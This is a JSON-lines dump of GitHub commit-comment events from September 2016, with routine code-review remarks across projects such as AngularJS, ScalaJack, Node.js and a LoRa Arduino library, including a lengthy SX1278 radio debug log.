{"id":"4517914801","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":18902723,"position":null,"line":null,"path":null,"commit_id":"7eddc8891b516ad99152b0826f655e37c4fa728c","created_at":"2016-09-05T17:52:38Z","updated_at":"2016-09-05T17:52:38Z","body":"The code changes LGTM. I left a couple of minor comments regarding docs. Also regarding docs:\r\n- In the [Angular Expressions][1] section of the guide, we mention that _\"Angular expressions do not have access to global variables like window, document or location\"_.  \r\n  I would change that to: _\"do not have **direct** access\"_\r\n\r\n[1]: https://docs.angularjs.org/guide/expression#context"}},"created_at":"2016-09-05T17:52:38Z"}
{"id":"4517914931","type":"CommitCommentEvent","actor":{"login":"gzoller"},"repo":{"name":"gzoller/ScalaJack"},"payload":{"comment":{"id":18902724,"position":null,"line":null,"path":null,"commit_id":"b7e41e03df511b205857a1a26fbf8385d9730630","created_at":"2016-09-05T17:52:44Z","updated_at":"2016-09-05T17:52:44Z","body":"Ok... LOTs going on in the last few commits!  I got (I think) parameterized types generally working (yay!).  You'll see the core algorithm in PolymorphicTypeAdapter but it involves mapping the (known) input types to the (erased) types of the concrete class, matching number and order of the trait's & class' parameter type lists (which may be different).  Whew!\r\n\r\nWith a key hack (more info on that in a bit) all v3 tests pass green in branch exp2.\r\n\r\nI'm not 100% sure we're done with that mess--later more exhaustive testing of cases will reveal that.\r\n\r\nI also found a case that breaks 4.8.3 ScalaJack that is fixed in the new design, so that's always a huge win.  That's the direction we need.\r\n\r\nOk, so we do have a problem...  To make things work I needed to comment out all the caching in Context.  First verify my results in exp2 by running:\r\n\r\n```testOnly co.blocke.scalajack.test.v3.*```\r\n\r\nNow un-comment the cache code (with printlns) in Context and run: ```testOnly *.Foo```\r\n\r\nYou should see:\r\n\r\n```\r\nNot Found! co.blocke.scalajack.test.Breakfast(java.lang.String)\r\nNot Found! scala.Boolean()\r\n>> Saved: scala.Boolean()\r\nNot Found! co.blocke.scalajack.test.Tart(java.lang.String)\r\nNot Found! scala.reflect.api.Types.Type()\r\n>> Saved: scala.reflect.api.Types.Type()\r\nNot Found! java.lang.String()\r\n>> Saved: java.lang.String()\r\n>> Saved: co.blocke.scalajack.test.Tart(java.lang.String)\r\nFound! java.lang.String()\r\n>> Saved: co.blocke.scalajack.test.Breakfast(java.lang.String)\r\nNot Found! co.blocke.scalajack.test.Toast(java.lang.String)\r\nNot Found! scala.Int()\r\n>> Saved: scala.Int()\r\nNot Found! java.lang.String()\r\n>> Saved: java.lang.String()\r\nFound! java.lang.String()\r\n>> Saved: co.blocke.scalajack.test.Toast(java.lang.String)\r\n{\"y\":true,\"bread\":{\"_hint\":\"co.blocke.scalajack.test.Toast\",\"g\":7,\"yum\":\"Burnt\"}}\r\nNot Found! co.blocke.scalajack.test.Breakfast(java.lang.String)\r\nFound! scala.Boolean()\r\nNot Found! co.blocke.scalajack.test.Tart(java.lang.String)\r\nFound! scala.reflect.api.Types.Type()\r\nFound! java.lang.String()\r\n>> Saved: co.blocke.scalajack.test.Tart(java.lang.String)\r\nFound! java.lang.String()\r\n>> Saved: co.blocke.scalajack.test.Breakfast(java.lang.String)\r\nFound! co.blocke.scalajack.test.Toast(java.lang.String)\r\n-----------------------\r\nNot Found! co.blocke.scalajack.test.Breakfast(co.blocke.scalajack.test.Two)\r\nFound! scala.Boolean()\r\nNot Found! co.blocke.scalajack.test.Tart(co.blocke.scalajack.test.Two)\r\nFound! scala.reflect.api.Types.Type()\r\nFound! java.lang.String()\r\n>> Saved: co.blocke.scalajack.test.Tart(co.blocke.scalajack.test.Two)\r\nFound! java.lang.String()\r\n>> Saved: co.blocke.scalajack.test.Breakfast(co.blocke.scalajack.test.Two)\r\nFound! co.blocke.scalajack.test.Toast(co.blocke.scalajack.test.Two)\r\n```\r\n\r\nIn the first case notice that String is not found, saved, found, then later not found again later.  Why?\r\nMore problematic:  Look at the last line of the second case after the divider.  See where it found co.blocke.scalajack.test.Toast(co.blocke.scalajack.test.Two)?  Hmm... Look at the output.  It's never saved.  What *was* saved (from the first case) was co.blocke.scalajack.test.Toast(java.lang.String). \r\n\r\nEek!  Something in the tpe \"equals\" for Type either doesn't account for the types or the types aren't being set properly prior to lookup and/or storage.  I'm voting the later.  We pass in the parameter types which are typically either empty or the typeArgs of the type, except for a polytype in which case its the specially processed type list.  Whatever the types they should somehow be grafted onto tpe for lookup and storage into resolvedTypeAdapters.\r\n\r\nI'll play around with it, but that's where it stands.  Frankly this is a MUCH better problem to solve because the nasty parameterized types is working.\r\n\r\nMy suggestion is let's get these basic cases working and all the old tests passing then optimize for any fancy inference of Any you were talking about the other day (MyThing[_]).  I think this is indeed possible as long as the inferred type is any mix of primitives and basic collection of primitives.  We need that logic for Any type anyway.\r\n\r\nCheers!"}},"created_at":"2016-09-05T17:52:44Z"}
{"id":"4517915523","type":"CommitCommentEvent","actor":{"login":"wonglkd"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":18902727,"position":31,"line":93,"path":"app/Member.php","commit_id":"ec5c8c39aba7b91ffe9ca422f221bbf35e308e85","created_at":"2016-09-05T17:53:02Z","updated_at":"2016-09-05T17:53:02Z","body":"Having an empty if-condition is really NOT a good practice... you could leave it out, or just have a comment somewhere below."}},"created_at":"2016-09-05T17:53:02Z"}
{"id":"4517915575","type":"CommitCommentEvent","actor":{"login":"dreamer-dead"},"repo":{"name":"izaharkin/SplashGeom"},"payload":{"comment":{"id":18902728,"position":4,"line":27,"path":"src/splash_utils.cpp","commit_id":"c423e212af26003f75361b6463c26b458c914c44","created_at":"2016-09-05T17:53:04Z","updated_at":"2016-09-05T17:53:04Z","body":"А почему вектор то?\r\nКорней не может быть больше 2х, причем при нулевом дискриминанте они просто тождественны.\r\nНе проще было взять std::pair<double, double> и забыть про выделение памяти вектором?\r\nА еще sqrt(D) можно один раз вызывать, потому что нет гарантий что компилятор оптимизирует."}},"created_at":"2016-09-05T17:53:04Z"}
{"id":"4517916024","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"malikova-anastasiia/Lemon-School"},"payload":{"comment":{"id":18902731,"position":null,"line":null,"path":null,"commit_id":"7d6af82b4918084bffebe40e0401e797657f5295","created_at":"2016-09-05T17:53:17Z","updated_at":"2016-09-05T17:53:17Z","body":"проверь на валидность свою вёрстку и укажи свою ошибку"}},"created_at":"2016-09-05T17:53:17Z"}
{"id":"4517917513","type":"CommitCommentEvent","actor":{"login":"pineapplemachine"},"repo":{"name":"pineapplemachine/mach.d"},"payload":{"comment":{"id":18902732,"position":null,"line":null,"path":null,"commit_id":"3f3b64d45c333bb2b0fa1dbb5e308666833c63c3","created_at":"2016-09-05T17:53:56Z","updated_at":"2016-09-05T17:53:56Z","body":"Destructors. I meant destructors."}},"created_at":"2016-09-05T17:53:56Z"}
{"id":"4517918418","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18902733,"position":null,"line":null,"path":null,"commit_id":"7e9e3a4ef73608d28b54c74aae22a2b0cec25779","created_at":"2016-09-05T17:54:19Z","updated_at":"2016-09-05T17:54:19Z","body":"Show this to @valentinkip please"}},"created_at":"2016-09-05T17:54:19Z"}
{"id":"4517919016","type":"CommitCommentEvent","actor":{"login":"wonglkd"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":18902734,"position":51,"line":113,"path":"app/Member.php","commit_id":"ec5c8c39aba7b91ffe9ca422f221bbf35e308e85","created_at":"2016-09-05T17:54:37Z","updated_at":"2016-09-05T17:54:37Z","body":"Does returning a redirect work here? I believe this function is meant to return an array. Returning a redirect is meant more for methods in the controller, I think."}},"created_at":"2016-09-05T17:54:37Z"}
{"id":"4517920349","type":"CommitCommentEvent","actor":{"login":"thgreasi"},"repo":{"name":"thgreasi/localForage-cordovaSQLiteDriver"},"payload":{"comment":{"id":18902736,"position":5,"line":36,"path":"dist/localforage-cordovasqlitedriver.es6.js","commit_id":"0373437722ebff7e0196a57243f60734c6eb7edc","created_at":"2016-09-05T17:55:13Z","updated_at":"2016-09-05T17:55:13Z","body":"@mathieudutour fixed this typo in v1.4.6. Thanks for reporting :+1:"}},"created_at":"2016-09-05T17:55:13Z"}
{"id":"4517920926","type":"CommitCommentEvent","actor":{"login":"danbev"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":18902738,"position":20,"line":3421,"path":"src/node.cc","commit_id":"a01e8bcf189bd598d496f347f60007bc2211e528","created_at":"2016-09-05T17:55:26Z","updated_at":"2016-09-05T17:55:26Z","body":"@Fishrock123 Sorry about not allowing enough review time and having already merged this. I'll create a new PR with this update. "}},"created_at":"2016-09-05T17:55:26Z"}
{"id":"4517921071","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"americool/sep-assignments"},"payload":{"comment":{"id":18902740,"position":24,"line":24,"path":"02-algorithms/1-Intro/intro_algos_answers.txt","commit_id":"b4f9f5f92178a94e8803691b2e28747324c5468c","created_at":"2016-09-05T17:55:31Z","updated_at":"2016-09-05T17:55:31Z","body":"This is perfectly fine. The point of pseudo-code is not necessarily to use a strict syntax (that would be programming), but to describe the process in a way that could be translated more or less line by line to code."}},"created_at":"2016-09-05T17:55:31Z"}
{"id":"4517921426","type":"CommitCommentEvent","actor":{"login":"annProg"},"repo":{"name":"annProg/url_monitor"},"payload":{"comment":{"id":18902742,"position":null,"line":null,"path":null,"commit_id":"22340ea13f5ff61e0ef81fdc9ec2a26c5a6600b1","created_at":"2016-09-05T17:55:39Z","updated_at":"2016-09-05T17:55:39Z","body":"此commit的目的是方便在kapacitor中取到`require_str`, `require_code`等值。\r\n\r\n之前这些作为tag时，取值的做法是fromNode的groupBy包含`require_str`, `require_code`等，这样当用户改变了这些配置时，series发生改变，可能导致OK信息无法触发"}},"created_at":"2016-09-05T17:55:39Z"}
{"id":"4517921672","type":"CommitCommentEvent","actor":{"login":"maxxx"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18902743,"position":null,"line":null,"path":null,"commit_id":"333a3e05f6d84213b1bd9473d0be048253bc2d5f","created_at":"2016-09-05T17:55:46Z","updated_at":"2016-09-05T17:55:46Z","body":"copypasta in SpellTargetSelector::operator()(Unit const* target) not updated with this change"}},"created_at":"2016-09-05T17:55:46Z"}
{"id":"4517922044","type":"CommitCommentEvent","actor":{"login":"niutech"},"repo":{"name":"niutech/Monitorix"},"payload":{"comment":{"id":18902745,"position":null,"line":null,"path":null,"commit_id":"8a92bb772246276a85bbd5c13b7de54a6cead2e8","created_at":"2016-09-05T17:55:57Z","updated_at":"2016-09-05T17:55:57Z","body":"Merged with the upstream master."}},"created_at":"2016-09-05T17:55:57Z"}
{"id":"4517922322","type":"CommitCommentEvent","actor":{"login":"danbev"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":18902746,"position":24,"line":3425,"path":"src/node.cc","commit_id":"a01e8bcf189bd598d496f347f60007bc2211e528","created_at":"2016-09-05T17:56:02Z","updated_at":"2016-09-05T17:56:02Z","body":"@cjihrig Sorry about not allowing enough review time and having already merged this. I'll create a new PR with this update and the update from @Fishrock123. "}},"created_at":"2016-09-05T17:56:02Z"}
{"id":"4517922387","type":"CommitCommentEvent","actor":{"login":"jcameron"},"repo":{"name":"webmin/webmin"},"payload":{"comment":{"id":18902747,"position":null,"line":null,"path":null,"commit_id":"22c8d8d0417f4a11d41b5d430b5e1769518e0f52","created_at":"2016-09-05T17:56:06Z","updated_at":"2016-09-05T17:56:06Z","body":"This just changes the default for new installs.\r\n"}},"created_at":"2016-09-05T17:56:06Z"}
{"id":"4517922637","type":"CommitCommentEvent","actor":{"login":"papajoker"},"repo":{"name":"excalibur1234/pacli-simple"},"payload":{"comment":{"id":18902748,"position":null,"line":null,"path":null,"commit_id":"3349e026d1ea3e5c1c6be1e23d0f8bf82ff5d090","created_at":"2016-09-05T17:56:12Z","updated_at":"2016-09-05T17:56:12Z","body":"[What is the difference between test](http://mywiki.wooledge.org/BashFAQ/031), [ and [[ ?"}},"created_at":"2016-09-05T17:56:12Z"}
{"id":"4517923342","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"americool/sep-assignments"},"payload":{"comment":{"id":18902749,"position":31,"line":31,"path":"02-algorithms/1-Intro/intro_algos_answers.txt","commit_id":"b4f9f5f92178a94e8803691b2e28747324c5468c","created_at":"2016-09-05T17:56:30Z","updated_at":"2016-09-05T17:56:30Z","body":"To avoid using operators, I would say \"MULTIPLY total by .2\""}},"created_at":"2016-09-05T17:56:30Z"}
{"id":"4517923723","type":"CommitCommentEvent","actor":{"login":"sourcerer-mike"},"repo":{"name":"sourcerer-mike/crmp"},"payload":{"comment":{"id":18902750,"position":25,"line":25,"path":"src/Crmp/CrmBundle/DomainRepository/Addresses.php","commit_id":"89adfcfdb44dc141cb1d7dde237deb3b7a619308","created_at":"2016-09-05T17:56:40Z","updated_at":"2016-09-05T17:56:40Z","body":"Thanks for that! You're right and now that the class is almost done I don't use anything else there. \r\n\r\nCQRS will come. And then all controller should only delegate to the CommandBus. I think this is easier to test than having all logic inside the controller and mock things around every path/node of the control flow (for maximum code coverage). I hope this decreases with CQRS or is more separated at least.\r\n\r\nThanks you for your help and comment.\r\nIt helps me learning Symfony ;-)"}},"created_at":"2016-09-05T17:56:40Z"}
{"id":"4517924832","type":"CommitCommentEvent","actor":{"login":"davidakachaos"},"repo":{"name":"davidakachaos/PokemonGo-Bot"},"payload":{"comment":{"id":18902753,"position":4,"line":363,"path":"pokemongo_bot/__init__.py","commit_id":"c361f58f51670b232899b767938234e65f42426c","created_at":"2016-09-05T17:57:09Z","updated_at":"2016-09-05T17:57:09Z","body":":+1: Yes"}},"created_at":"2016-09-05T17:57:09Z"}
{"id":"4517925009","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18902754,"position":null,"line":null,"path":null,"commit_id":"c0979b5b1774fcc893a3b1db7696666ec6a396c6","created_at":"2016-09-05T17:57:13Z","updated_at":"2016-09-05T17:57:13Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/400/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-05T17:57:13Z"}
{"id":"4517926625","type":"CommitCommentEvent","actor":{"login":"davidakachaos"},"repo":{"name":"davidakachaos/PokemonGo-Bot"},"payload":{"comment":{"id":18902757,"position":21,"line":142,"path":"pokemongo_bot/cell_workers/catch_pokemon.py","commit_id":"c361f58f51670b232899b767938234e65f42426c","created_at":"2016-09-05T17:57:58Z","updated_at":"2016-09-05T17:57:58Z","body":"Yes, I removed this, it's not needed to push it out. Incense only works for the player, nobody else."}},"created_at":"2016-09-05T17:57:58Z"}
{"id":"4517926632","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"evgeniyvladimirovich/lemon-school"},"payload":{"comment":{"id":18902758,"position":19,"line":19,"path":"4/домашняя работа4.html","commit_id":"098f26bd4f257b24f05be1183ae4344a1a13e8e9","created_at":"2016-09-05T17:57:58Z","updated_at":"2016-09-05T17:57:58Z","body":"поработай над отступами в своей вёрстке"}},"created_at":"2016-09-05T17:57:58Z"}
{"id":"4517927496","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":18902759,"position":null,"line":null,"path":null,"commit_id":"5594a38d7e70badbbcf8a33d92e095a05dae5c49","created_at":"2016-09-05T17:58:22Z","updated_at":"2016-09-05T17:58:22Z","body":"This was for ceylon/ceylon-ide-intellij#458."}},"created_at":"2016-09-05T17:58:22Z"}
{"id":"4517928997","type":"CommitCommentEvent","actor":{"login":"Jswoon"},"repo":{"name":"wirelessopensource/lora_shield_arduino"},"payload":{"comment":{"id":18902763,"position":null,"line":null,"path":null,"commit_id":"fc4892b973913a326c5c68cfbc18c407c0c7d352","created_at":"2016-09-05T17:59:02Z","updated_at":"2016-09-05T17:59:02Z","body":"Hi Pedro,\n\nThank you for responding to my problem. I followed your instruction to\nchange the SX 1278_debug_mode variable to 2 in SX1278.h.\n\nFor Sending log,\nsx1278 module and Arduino: send two packets (One to an addrees and another\none in broadcast)\n\nStarting 'ON'\n\nStarting 'setMaxCurrent'\n## Reading:  ## Register 1:  9\n## Writing:  ## Register 1:  81\n## Writing:  ## Register B:  3B\n## Writing:  ## Register 1:  9\n## Setting ON with maximum current supply ##\n\n\nStarting 'setLORA'\n## Writing:  ## Register 1:  0\n## Writing:  ## Register 1:  80\n## Writing:  ## Register 1:  81\n## Writing:  ## Register 23:  FF\n## Writing:  ## Register 1D:  72\n## Writing:  ## Register 1E:  70\n## Writing:  ## Register 26:  0\n## Reading:  ## Register 1:  81\n## LoRa set with success ##\n\nSetting power ON: SUCCESS\n\nStarting 'setMode'\n## Reading:  ## Register 1:  81\n## Writing:  ## Register 1:  81\n\nStarting 'setCR'\n## Reading:  ## Register 1:  81\n## Writing:  ## Register 1:  81\n## Reading:  ## Register 1D:  72\n## Writing:  ## Register 1D:  72\n## Reading:  ## Register 1D:  72\n\nStarting 'isCR'\n## Coding Rate 1 has been successfully set ##\n\n## Writing:  ## Register 1:  81\n\nStarting 'setSF'\n## Reading:  ## Register 1:  81\n## Writing:  ## Register 1:  81\n## Reading:  ## Register 1E:  70\n## Reading:  ## Register 26:  0\n\nStarting 'getBW'\n## Reading:  ## Register 1D:  72\n\nStarting 'isBW'\n## Bandwidth is 7 ##\n\n## Writing:  ## Register 31:  3\n## Writing:  ## Register 37:  A\n## Writing:  ## Register 1E:  C3\n## Writing:  ## Register 26:  C\n## Reading:  ## Register 1E:  C3\n## Reading:  ## Register 26:  C\n\nStarting 'getBW'\n## Reading:  ## Register 1D:  72\n\nStarting 'isBW'\n## Bandwidth is 7 ##\n\n## Writing:  ## Register 1:  81\n\nStarting 'isSF'\n## Spreading factor 12 has been successfully set ##\n\n\nStarting 'setBW'\n## Reading:  ## Register 1:  81\n## Writing:  ## Register 1:  81\n## Reading:  ## Register 1D:  72\n## Reading:  ## Register 26:  C\n## Writing:  ## Register 1D:  92\n## Writing:  ## Register 26:  C\n## Reading:  ## Register 1D:  92\n## Reading:  ## Register 26:  C\n\nStarting 'isBW'\n## Bandwidth 9 has been successfully set ##\n\n## Writing:  ## Register 1:  81\n## Reading:  ## Register 1D:  92\n## Reading:  ## Register 1E:  C3\n## Mode 4 configured with success ##\n## Writing:  ## Register 1:  81\nSetting Mode: SUCCESS\n\nStarting 'setHeaderON'\n## Reading:  ## Register 1D:  92\n## Writing:  ## Register 1D:  92\n## Reading:  ## Register 1D:  92\n## Header has been activated ##\n\nSetting Header ON: SUCCESS\n\nStarting 'setChannel'\n## Reading:  ## Register 1:  81\n## Writing:  ## Register 1:  81\n## Writing:  ## Register 6:  6C\n## Writing:  ## Register 7:  72\n## Writing:  ## Register 8:  4F\n## Reading:  ## Register 6:  6C\n## Reading:  ## Register 7:  72\n## Reading:  ## Register 8:  4F\n## Frequency channel 6C724F has been successfully set ##\n\n\nStarting 'isChannel'\n## Writing:  ## Register 1:  81\nSetting Channel: SUCCESS\n\nStarting 'setCRC_ON'\n## Reading:  ## Register 1E:  C3\n## Writing:  ## Register 1E:  C7\n## Reading:  ## Register 1E:  C7\n## CRC has been activated ##\n\nSetting CRC ON: SUCCESS\n\nStarting 'setPower'\n## Reading:  ## Register 1:  81\n## Writing:  ## Register 1:  81\n## Writing:  ## Register 4D:  84\n## Writing:  ## Register 4D:  87\n## Writing:  ## Register 9:  FF\n## Reading:  ## Register 9:  FF\n## Output power has been successfully set ##\n\n## Writing:  ## Register 1:  81\nSetting Power: SUCCESS\n\nStarting 'setNodeAddress'\n## Reading:  ## Register 1:  81\nSetting node address: SUCCESS\nsx1278 configured finished\n\n\nStarting 'sendPacketTimeout'\n\nStarting 'setPacket'\n## Reading:  ## Register 1:  81\n## Reading:  ## Register 1:  81\n## Writing:  ## Register 1:  81\n## Writing:  ## Register 12:  FF\n## Writing:  ## Register 1:  81\n## LoRa flags cleared ##\n\nStarting 'setDestination'\n## Destination 4 successfully set ##\n## Source 2 successfully set ##\n## Packet number 0 successfully set ##\n\n\nStarting 'setPayload'\n\nStarting 'truncPayload'\n\nStarting 'setPacketLength'\n## Reading:  ## Register 1:  81\n## Writing:  ## Register 1:  81\n## Writing:  ## Register 22:  4B\n## Reading:  ## Register 22:  4B\n## Packet length 75 has been successfully set ##\n\n## Writing:  ## Register 1:  81\n## Writing:  ## Register E:  0\n## Writing:  ## Register D:  0\n## Writing:  ## Register 0:  4\n## Writing:  ## Register 0:  2\n## Writing:  ## Register 0:  0\n## Writing:  ## Register 0:  4B\n## Writing:  ## Register 0:  50\n## Writing:  ## Register 0:  61\n## Writing:  ## Register 0:  63\n## Writing:  ## Register 0:  6B\n## Writing:  ## Register 0:  65\n## Writing:  ## Register 0:  74\n## Writing:  ## Register 0:  20\n## Writing:  ## Register 0:  31\n## Writing:  ## Register 0:  2C\n## Writing:  ## Register 0:  20\n## Writing:  ## Register 0:  77\n## Writing:  ## Register 0:  61\n## Writing:  ## Register 0:  6E\n## Writing:  ## Register 0:  74\n## Writing:  ## Register 0:  69\n## Writing:  ## Register 0:  6E\n## Writing:  ## Register 0:  67\n## Writing:  ## Register 0:  20\n## Writing:  ## Register 0:  74\n## Writing:  ## Register 0:  6F\n## Writing:  ## Register 0:  20\n## Writing:  ## Register 0:  73\n## Writing:  ## Register 0:  65\n## Writing:  ## Register 0:  65\n## Writing:  ## Register 0:  20\n## Writing:  ## Register 0:  69\n## Writing:  ## Register 0:  66\n## Writing:  ## Register 0:  20\n## Writing:  ## Register 0:  72\n## Writing:  ## Register 0:  65\n## Writing:  ## Register 0:  63\n## Writing:  ## Register 0:  65\n## Writing:  ## Register 0:  69\n## Writing:  ## Register 0:  76\n## Writing:  ## Register 0:  65\n## Writing:  ## Register 0:  64\n## Writing:  ## Register 0:  20\n## Writing:  ## Register 0:  70\n## Writing:  ## Register 0:  61\n## Writing:  ## Register 0:  63\n## Writing:  ## Register 0:  6B\n## Writing:  ## Register 0:  65\n## Writing:  ## Register 0:  74\n## Writing:  ## Register 0:  20\n## Writing:  ## Register 0:  69\n## Writing:  ## Register 0:  73\n## Writing:  ## Register 0:  20\n## Writing:  ## Register 0:  74\n## Writing:  ## Register 0:  68\n## Writing:  ## Register 0:  65\n## Writing:  ## Register 0:  20\n## Writing:  ## Register 0:  73\n## Writing:  ## Register 0:  61\n## Writing:  ## Register 0:  6D\n## Writing:  ## Register 0:  65\n## Writing:  ## Register 0:  20\n## Writing:  ## Register 0:  61\n## Writing:  ## Register 0:  73\n## Writing:  ## Register 0:  20\n## Writing:  ## Register 0:  73\n## Writing:  ## Register 0:  65\n## Writing:  ## Register 0:  6E\n## Writing:  ## Register 0:  74\n## Writing:  ## Register 0:  20\n## Writing:  ## Register 0:  70\n## Writing:  ## Register 0:  61\n## Writing:  ## Register 0:  63\n## Writing:  ## Register 0:  6B\n## Writing:  ## Register 0:  65\n## Writing:  ## Register 0:  74\n## Writing:  ## Register 0:  0\n## Packet set and written in FIFO ##\n## Packet to send:\n4|2|0|4B|50|61|63|6B|65|74|20|31|2C|20|77|61|6E|74|69|6E|67|20|74|6F|20|73|65|65|20|69|66|20|72|65|63|65|69|76|65|64|20|70|61|63|6B|65|74|20|69|73|20|74|68|65|20|73|61|6D|65|20|61|73|20|73|65|6E|74|20|70|61|63|6B|65|74|0\n##\n## Writing:  ## Register 1:  81\n\nStarting 'setTimeout'\nTimeout to send/receive is: 1780\n\nStarting 'sendWithTimeout'\n## Reading:  ## Register 1:  81\n## Writing:  ## Register 1:  81\n## Writing:  ## Register 12:  FF\n## Writing:  ## Register 1:  81\n## LoRa flags cleared ##\n## Writing:  ## Register 1:  83\n## Reading:  ## Register 12:  FF\n## Packet successfully sent ##\n\n## Reading:  ## Register 1:  FF\n## Writing:  ## Register 1:  81\n## Writing:  ## Register 12:  FF\n## Writing:  ## Register 1:  FF\n## LoRa flags cleared ##\nPacket sent, state 0\n\nStarting 'sendPacketTimeout'\n\nStarting 'setPacket'\n## Reading:  ## Register 1:  81\n## Reading:  ## Register 1:  81\n## Writing:  ## Register 1:  81\n## Writing:  ## Register 12:  FF\n## Writing:  ## Register 1:  81\n## LoRa flags cleared ##\n\nStarting 'setDestination'\n## Destination 0 successfully set ##\n## Source 2 successfully set ##\n## Packet number 1 successfully set ##\n\nIn the next e-mail, I will send you the Receiving log so it do not looks\nthat messy.\n\nThank you for your help.\n\nRegards,\nShen\n\nOn Mon, Sep 5, 2016 at 6:10 PM, Wireless Open Source <\nnotifications@github.com> wrote:\n\n> Hi! I can't resolve your problem if you only have this info, you can\n> change the SX1278_debug_mode variable to 2 in SX1278.h, so we can see the\n> log.\n>\n> Regards,\n> Pedro\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/wirelessopensource/lora_shield_arduino/commit/fc4892b973913a326c5c68cfbc18c407c0c7d352#commitcomment-18898333>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AR3U6tW8pMuA-rp9q6Duycf34p84g6Lqks5qm-qZgaJpZM4J0Uj3>\n> .\n>\n"}},"created_at":"2016-09-05T17:59:02Z"}
{"id":"4517929340","type":"CommitCommentEvent","actor":{"login":"PRJosh"},"repo":{"name":"Flinny/android_build"},"payload":{"comment":{"id":18902765,"position":null,"line":null,"path":null,"commit_id":"822e920c55a79a3de61bb55ba4bbec7fcdddf246","created_at":"2016-09-05T17:59:12Z","updated_at":"2016-09-05T17:59:12Z","body":"-2 Breaks build, was reverted on staging/cm-14.0-caf"}},"created_at":"2016-09-05T17:59:12Z"}
{"id":"4517929587","type":"CommitCommentEvent","actor":{"login":"SunsMan"},"repo":{"name":"vofus/training_lesson_angular_todo-app"},"payload":{"comment":{"id":18902766,"position":109,"line":109,"path":"app/controllers/main.controller.js","commit_id":"569aeaff801900f26aca88a3b86346d45ab98d98","created_at":"2016-09-05T17:59:18Z","updated_at":"2016-09-05T17:59:18Z","body":"Может подумать над тем, чтобы фильтровать в разметке? Это нативное использование самих фильтров."}},"created_at":"2016-09-05T17:59:18Z"}
{"id":"4517929844","type":"CommitCommentEvent","actor":{"login":"leskal"},"repo":{"name":"Deepflex/android_device_elephone_p9000"},"payload":{"comment":{"id":18902767,"position":null,"line":null,"path":null,"commit_id":"552488da78dcd843ba9bfec53314dfbee7f98adf","created_at":"2016-09-05T17:59:26Z","updated_at":"2016-09-05T17:59:26Z","body":"http://review.cyanogenmod.org/#/c/136594/3"}},"created_at":"2016-09-05T17:59:26Z"}
{"id":"4517930158","type":"CommitCommentEvent","actor":{"login":"sebyx07"},"repo":{"name":"sebyx07/ltzz"},"payload":{"comment":{"id":18902769,"position":5,"line":8,"path":"frontend/app/templates/components/page/nav-bar.hbs","commit_id":"1c6263b7f99228ce197ff86eab9f658123aeb7e5","created_at":"2016-09-05T17:59:34Z","updated_at":"2016-09-05T17:59:34Z","body":"```hbs\r\n{{#link-to \"homepage\" class=\"logo-text\"}}\r\n<span>LtzChat</span>\r\n{{/link-to}}\r\n```"}},"created_at":"2016-09-05T17:59:34Z"}
{"id":"4517931373","type":"CommitCommentEvent","actor":{"login":"SunsMan"},"repo":{"name":"vofus/training_lesson_angular_todo-app"},"payload":{"comment":{"id":18902771,"position":34,"line":34,"path":"app/controllers/main.controller.js","commit_id":"569aeaff801900f26aca88a3b86346d45ab98d98","created_at":"2016-09-05T18:00:04Z","updated_at":"2016-09-05T18:00:04Z","body":"а зачем возвращать есть функция 'activate' ничему не присваивает данные?)\r\n"}},"created_at":"2016-09-05T18:00:04Z"}
{"id":"4517931454","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"americool/sep-assignments"},"payload":{"comment":{"id":18902772,"position":34,"line":34,"path":"02-algorithms/1-Intro/intro_algos_answers.txt","commit_id":"b4f9f5f92178a94e8803691b2e28747324c5468c","created_at":"2016-09-05T18:00:06Z","updated_at":"2016-09-05T18:00:06Z","body":"\"ROUND total up to nearest int\" would suffice."}},"created_at":"2016-09-05T18:00:06Z"}
{"id":"4517932070","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18902773,"position":null,"line":null,"path":null,"commit_id":"c397719afa64853b642e9463ef139fde1e0db460","created_at":"2016-09-05T18:00:19Z","updated_at":"2016-09-05T18:00:19Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/401/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=)."}},"created_at":"2016-09-05T18:00:19Z"}
{"id":"4517934150","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"americool/sep-assignments"},"payload":{"comment":{"id":18902782,"position":38,"line":38,"path":"02-algorithms/1-Intro/intro_algos_answers.txt","commit_id":"b4f9f5f92178a94e8803691b2e28747324c5468c","created_at":"2016-09-05T18:01:01Z","updated_at":"2016-09-05T18:01:01Z","body":"I would avoid something so concrete as `array`"}},"created_at":"2016-09-05T18:01:01Z"}
